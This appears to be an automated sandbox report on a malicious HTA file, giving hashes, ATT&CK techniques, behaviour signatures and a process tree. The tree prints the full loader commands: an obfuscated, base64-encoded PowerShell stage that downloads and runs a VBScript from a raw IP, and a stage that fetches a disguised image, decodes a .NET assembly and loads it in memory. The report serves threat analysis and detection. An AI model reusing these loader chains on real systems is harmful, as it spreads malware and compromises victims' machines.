4c188a5d3208a2a49002ba3bc5325980e6852130209280486fce7a02a82fbced

General

Target

kissmewithlovesheisfineforme.hta
Size

47KB
MD5

b4178c1f8993ed905b0aed9c8ed7dccc
SHA1

9b554492f79c53a577756ef6b126799c5d0a5d25
SHA256

4c188a5d3208a2a49002ba3bc5325980e6852130209280486fce7a02a82fbced
SHA512

da3574b29043eaad6be10e8bd5d53eceaa1f62fd55a3f2f6271fce45f455f3f3a9d70eca7f992603703bbeacbcbc49769437e7be270c68f872737a73f316eebd
SSDEEP

384:OwK5UK7+XFQP8weX6jFKRgKGlB/fe3K537lvRvw:xYUJ/w13j643RZ4

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

exe.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2700	powershell.exe
6	2648	powershell.exe
7	2648	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2700	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2648	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2700	powershell.exe
2648	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1944 wrote to memory of 2324	1944	mshta.exe	30
PID 1944 wrote to memory of 2324	1944	mshta.exe	30
PID 1944 wrote to memory of 2324	1944	mshta.exe	30
PID 1944 wrote to memory of 2324	1944	mshta.exe	30
PID 2324 wrote to memory of 2700	2324	cmd.exe	32
PID 2324 wrote to memory of 2700	2324	cmd.exe	32
PID 2324 wrote to memory of 2700	2324	cmd.exe	32
PID 2324 wrote to memory of 2700	2324	cmd.exe	32
PID 2700 wrote to memory of 2436	2700	powershell.exe	33
PID 2700 wrote to memory of 2436	2700	powershell.exe	33
PID 2700 wrote to memory of 2436	2700	powershell.exe	33
PID 2700 wrote to memory of 2436	2700	powershell.exe	33
PID 2436 wrote to memory of 2816	2436	csc.exe	34
PID 2436 wrote to memory of 2816	2436	csc.exe	34
PID 2436 wrote to memory of 2816	2436	csc.exe	34
PID 2436 wrote to memory of 2816	2436	csc.exe	34
PID 2700 wrote to memory of 2780	2700	powershell.exe	36
PID 2700 wrote to memory of 2780	2700	powershell.exe	36
PID 2700 wrote to memory of 2780	2700	powershell.exe	36
PID 2700 wrote to memory of 2780	2700	powershell.exe	36
PID 2780 wrote to memory of 2648	2780	WScript.exe	37
PID 2780 wrote to memory of 2648	2780	WScript.exe	37
PID 2780 wrote to memory of 2648	2780	WScript.exe	37
PID 2780 wrote to memory of 2648	2780	WScript.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\kissmewithlovesheisfineforme.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1944
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C poWErShEll -EX bYpAss -NOp -w 1 -c DeviCECREdentiAlDEPlOYmenT ; INvoke-expRESSION($(InvoKe-ExPREssIOn('[SYstEM.tEXT.ENCoDInG]'+[cHar]0x3A+[CHaR]0X3A+'Utf8.gETsTRiNG([SySTEm.CONVERt]'+[Char]0X3a+[cHAr]58+'fROmbAsE64STring('+[chaR]0X22+'JHdJZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJEZUZpTkl0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtT04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWaXR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocGxkLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoVE1QU3ZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWk5seld4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKbyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ3pDZ1ZYTyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBVlNXSEVLWWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkd0lkOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTM3LjE4NC4xMDIuMTAwLzIyMC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5nb29kdGhpbmdzZm9ydS50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZ29vZHRoaW5nZm8udmJTIiwwLDApO3N0QVJULVNMRUVQKDMpO0lOVm9rRS1lWHByRVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZ29vZHRoaW5nZm8udmJTIg=='+[char]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWErShEll -EX bYpAss -NOp -w 1 -c DeviCECREdentiAlDEPlOYmenT ; INvoke-expRESSION($(InvoKe-ExPREssIOn('[SYstEM.tEXT.ENCoDInG]'+[cHar]0x3A+[CHaR]0X3A+'Utf8.gETsTRiNG([SySTEm.CONVERt]'+[Char]0X3a+[cHAr]58+'fROmbAsE64STring('+[chaR]0X22+'JHdJZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJEZUZpTkl0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtT04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWaXR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocGxkLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoVE1QU3ZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWk5seld4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKbyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ3pDZ1ZYTyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBVlNXSEVLWWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkd0lkOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTM3LjE4NC4xMDIuMTAwLzIyMC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5nb29kdGhpbmdzZm9ydS50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZ29vZHRoaW5nZm8udmJTIiwwLDApO3N0QVJULVNMRUVQKDMpO0lOVm9rRS1lWHByRVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZ29vZHRoaW5nZm8udmJTIg=='+[char]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2700
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kx75tea3.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2436
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F7B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9F7A.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2816
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdbestthingswithentiretimegivengoodthingfo.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2780
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.kcab#ego#gnih#yreverofyppaheb/022/001.201.481.731//:p##h';$restoredText = $originalText -replace '#', 't';$ketose = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$serviceman = New-Object System.Net.WebClient;$polystelous = $serviceman.DownloadData($ketose);$anammox = [System.Text.Encoding]::UTF8.GetString($polystelous);$woodcarving = '<<BASE64_START>>';$arguably = '<<BASE64_END>>';$reinitialises = $anammox.IndexOf($woodcarving);$flabellations = $anammox.IndexOf($arguably);$reinitialises -ge 0 -and $flabellations -gt $reinitialises;$reinitialises += $woodcarving.Length;$ambagious = $flabellations - $reinitialises;$undecagonal = $anammox.Substring($reinitialises, $ambagious);$cromme = -join ($undecagonal.ToCharArray() | ForEach-Object { $_ })[-1..-($undecagonal.Length)];$legumes = [System.Convert]::FromBase64String($cromme);$bards = [System.Reflection.Assembly]::Load($legumes);$electrophone = [dnlib.IO.Home].GetMethod('VAI');$electrophone.Invoke($null, @($restoredText, 'coatimundi', 'coatimundi', 'coatimundi', 'CasPol', 'coatimundi', 'coatimundi','coatimundi','coatimundi','coatimundi','coatimundi','coatimundi','1','coatimundi','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9F7B.tmp

Filesize
1KB

MD5
4f73820172dd8d8c841631713c1f15bf

SHA1
57f6e55148f1ba7c513320efb5a61496d6e26a19

SHA256
fcbc241b68bd59563c0ddbdbd70e139244240afd11474fba06b19f4a74df2134

SHA512
6a1e39a713ecf8f36d4216fb1c09904bb5b2af6014149f107abd9538b601bf6bcf72f692363101566a7f002f93996e27c2ed475920927657c10f36ca48d06d51

Download Submit
C:\Users\Admin\AppData\Local\Temp\kx75tea3.dll

Filesize
3KB

MD5
0b589776f46f9095e43f6d66b8db651d

SHA1
c0f343267eff708b9fa25a9f14aee724282f57c0

SHA256
beeb6a45211a44069fa25dca10472382289ee64c53ae50cabdabd4de662d2926

SHA512
501cb51afc6fbdbe802d342f3241092698f0c3c5429cc9b18f65f07adc56f858c731fb3bdaef77d8d73c8cf6f7e7781f796db7d7fe3183c6129e6bafb4d067c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\kx75tea3.pdb

Filesize
7KB

MD5
4a79c9b47f5fae5d43e9aaa8ceb2642f

SHA1
285c3223823dce060b29b6515033f718b518457a

SHA256
89f4fa8f322954759614959f9ad7a198ebc889e937600e63d77e1997fb6aaffc

SHA512
71b3f31b69e28e7f3298e17af38b7c35f07856b775f106d53ee4c7b9609908064acd2bb598f0d3043110f365a9ea45f847e1070e3851d3d2272a95d22b2a5bf9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0170310d6de5e6c834f3bb7356e61b34

SHA1
c670aab4284fca392aabfb60b8fb073d6a7fa24a

SHA256
f005b2c133c8e54d95c8130ef022ab35a5a6ec0dfacfb14772afccfa63855575

SHA512
3f28e51c6543acc44bbdaa34833f0ec742ebe6d5da9554b8db4d300a96d92beafbfe4d1c48d527730275228c9d87ee976db85d11294e4921a1ad97e453717fe3

Download Submit
C:\Users\Admin\AppData\Roaming\createdbestthingswithentiretimegivengoodthingfo.vbS

Filesize
219KB

MD5
22c36e7b2a572912d7c30c34bd8ca173

SHA1
783d649087b9988abe81cacf03bde698826f1879

SHA256
c0ec30217ec33e0fae8854e4efbaa2a945a3722051b564d7f99604b300414d59

SHA512
2b1cdbad4d3f05957cf200921d3cc41220d8c1a0f2827b0d4371be6c5e7d1b7adf7f87390deec1b31fdd039155b907cb79c3a1bb51ec072d1905913fd9819830

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9F7A.tmp

Filesize
652B

MD5
b9eaf013a9cdb82ca2a4d6b62d87f68f

SHA1
b4c7dc228647f54c37b591e547ff9d9dd5bf0798

SHA256
bfd95d60312a188bb2708527142f6a7a2876d921864f2b434975b6efdda59972

SHA512
e09ceee58fbc2854479d556f27f774258e357a4d5445d96c870c05832382eeafbf97e4630180f12acee830cc222d9ea18276c98f69b54e10545705252352f9be

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kx75tea3.0.cs

Filesize
482B

MD5
bf923eace848d3771fd7e3dd3c96a846

SHA1
8ad214a0f00eed7b27351cd3d7d32e3caf494787

SHA256
6dff9f29ee65cb2c3ccc593c33e82f45704c319010e8b7094bcc51fb2543edc0

SHA512
538a83bfefbf9cb30b2a7c69cbb2ea2bf0ce2193408a8641862d40d2704883afc3c73dc86845581374d861e177e158ad4af2b4adee5814a8d6c5178423e5190a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kx75tea3.cmdline

Filesize
309B

MD5
582b0e121523b978a8cb5b236e985b99

SHA1
e35097ee9bc9162c77f4619a84488b8f80763a38

SHA256
4e08c0ff2d2f0c95080a2f2bc9febc440df1f6f220652aadeb3e505781d2c10d

SHA512
0a173ba467cdd1de2eac814f41191e61f3678278b65a8297693010273647eb1ac27ea6d6840019337b552c646bcae3eeb3945a3009b59cd6d2e067436e41c613

Download Submit

Analysis

Sharing